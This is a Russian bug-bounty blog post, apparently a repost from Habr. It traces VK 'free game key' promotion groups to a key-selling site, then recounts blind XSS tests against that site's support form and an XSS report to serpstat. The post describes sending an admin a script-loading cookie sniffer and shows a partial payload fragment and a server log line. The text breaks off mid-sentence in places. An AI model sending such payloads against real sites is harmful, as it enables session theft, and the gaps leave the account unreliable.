Предыстория: История эта начинается с того, что во многих пабликах, на которые я подписан, увидел посев групп с бесплатными ключами vk.com/******* и vk.com/*****. Посевы эти дорогие, производились в группах от 250 000 до 5 000 000 подписчиков, например в группе Наука и Техника. Группы предлагали каждому бесплатный ключ за подписку. Примерно через полмесяца увидел, что первая группа выросла до 109 тысяч подписчиков. Тут любому понятно, что бесплатный ключ люди не получат, ведь бесплатных ключей на 100 к человек не «напасешся». Немного осмотрев группу, я понял что «реальные» отзывы о получении бесплатных ключей подделка, ведь скриншоты из отзывов все время кидают одинаковые и ссылки на людей поддельные.
Самое интересное то, что люди на всё это до сих пор ведутся, вступают в группу в надежде на бесплатный ключ, делают репост в надежде на то, что им повезет и они выиграют дорогой игровой PC(но мы то знаем, что никто PC не получит), когда они хотят получить что-то бесплатно, ими легко манипулировать для своих целей.
Вся суть постов в группе — это реклама реферальной ссылки на сайт ***random.ru и получение выгоды.
Посмотрим на него.
support.gamedelivery.info. Есть функционал личного кабинета, там уязвимостей не обнаружено, в поиске по тикетам тоже. Надежда только на отправку запроса в спп.
Тестируем на слепую xss-уязвимость — отправляем админу обращение с именем и телом:
\"-->">
Мы отправили админу подгрузку js с нашим сниффером и редирект на наш сайт. Смотрим логи:
**3.9*.56.123 — - [18/Feb/2017:01:14:10 +0300] «GET /gamedelivery HTTP/1.1» 200 391686 "-" «Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.2 Safari/537.36»
Логи на сниффер не пришли, значит в поддержке пользователей стоит фильтр на script. НО , хотя смог удалить проект на втором тестовом аккаунте).
Я: Добрый день, обнаружил XSS уязвимость на Вашем сайте
https://www.openbugbounty.org/incidents/213614/.
Евгений:
Я: Вам нужна она, присылать подробности?
Евгений: Спасибо, оставьте себе.
Я: такое чувство, что вам совсем наплевать на безопасность сайта.
Евгений: Скорее, нет желания переходить по всяким ссылкам, которые Вы пишите в чате
(скорее всего, ссылка на openbugbounty испугала оператора)
Скриншот переписки:
Кстати, с этого можно сделать хороший мем
Вывод с этой статьи: В административной панели нужно ставить cookies на HttpOnly. serpstat.com — совсем не заботится о своей безопасности, лучше им не доверять свои данные.
Предыдущая статья:
[BugBounty] Частичный обход аутентификации vk.com.
P.S:Прошу подписаться на vk и twitter(ссылка внизу в контактах), там буду выкладывать информацию о новых статьях.
Все скриншоты и видео удалены, оригинал здесь
https://habrahabr.ru/post/322134/ .
Линейный вид
